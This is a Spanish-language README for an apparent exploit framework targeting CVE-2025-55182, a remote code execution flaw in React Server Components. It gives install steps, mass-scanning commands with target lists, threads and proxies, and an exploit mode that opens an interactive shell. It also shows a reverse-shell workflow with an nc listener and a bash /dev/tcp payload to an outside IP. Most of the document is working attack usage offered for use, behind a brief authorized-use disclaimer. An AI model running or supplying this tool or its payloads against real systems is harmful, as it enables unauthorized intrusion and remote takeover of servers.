
Escáner de vulnerabilidad RCE crítica para React Server Components (CVE-2025-55182). Marco de explotación automatizada con soporte de múltiples cargas útiles, capacidades de proxy y ejecución interactiva de comandos.
[!Warning] Este repositorio está destinado únicamente a fines educativos y de investigación.
- Utilice los PoCs proporcionados exclusivamente en sistemas que posea o tenga permiso explícito para probar.
- El acceso no autorizado, la explotación o el mal uso de cualquier material en este repositorio es ilegal.
- El(los) autor(es) no asumen ninguna responsabilidad por daños, mal uso o consecuencias legales derivadas del uso inadecuado.
CVE-2025-55182 es una vulnerabilidad crítica de ejecución remota de código que afecta a React Server Components versiones 19.0.0, 19.1.0, 19.1.1 y 19.2.0. Esta vulnerabilidad se debe a una deserialización insegura de cargas útiles de solicitudes HTTP a puntos finales de funciones del servidor, lo que permite a atacantes no autenticados ejecutar código arbitrario de forma remota.
ID CVE: CVE-2025-55182
Versiones Afectadas:
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]
python3 main.py -d -u https://example.com
python3 main.py -d -l targets.txt
python3 main.py -d -l targets.txt -p http://127.0.0.1:8080
python3 main.py -d -l targets.txt -s
python3 main.py -d -l targets.txt -t 20
python3 main.py -e -u https://vulnerable-site.com
Luego seleccione [i] para shell interactivo:
Elija método de explotación:
[i] Shell interactivo
[r] Reverse shell
Ingrese su opción (i/r): i
shell> whoami
ec2-user
shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)
shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
...
shell> exit
python3 main.py -e -u https://vulnerable-site.com
Luego seleccione [r] para reverse shell y elija el tipo de payload:
Elija método de explotación:
[i] Shell interactivo
[r] Reverse shell
Ingrese su opción (i/r): r
Elija opción de payload:
[d] Usar payloads predeterminados (Probar múltiples reverse shells)
[c] Proporcionar payload personalizado
Ingrese su opción (d/c): d
Ingrese su IP y puerto en este formato:
Ejemplo: 192.168.1.100:4444
IP:PORT> 192.168.1.100:4444
Configure su listener con este comando:
nc -lvnp 4444
Presione ENTER cuando su listener esté listo...
La herramienta intentará automáticamente más de 17 payloads de reverse shell diferentes hasta que uno tenga éxito.
Ingrese su opción (d/c): c
Ingrese su payload de reverse shell personalizado:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
| Argumento | Descripción |
|---|
-d, --detection | Ejecutar en modo detección (escanear vulnerabilidades) |
-e, --exploit | Ejecutar en modo explotación (explotar un solo objetivo) |
-u, --url URL | URL de un solo objetivo para escanear/explotar |
-l, --list FILE | Archivo con lista de URLs objetivo (solo modo detección) |
-p, --proxy URL | URL de proxy único (ej. http://127.0.0.1:8080) |
-pl, --proxy-list FILE | Archivo con lista de URLs de proxy (una por línea) |
-t, --threads N | Número de hilos concurrentes (predeterminado: 10, solo modo detección) |
-s, --silent | Modo silencioso - solo mostrar objetivos vulnerables (solo modo detección) |
-o, --output [FILE] | Guardar objetivos vulnerables en archivo (solo modo detección). Si no se proporciona nombre de archivo, usa el predeterminado: CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt |
--debug | Habilitar registro de depuración: muestra detalles de respuesta e intentos de reintento (no disponible en modo silencioso) |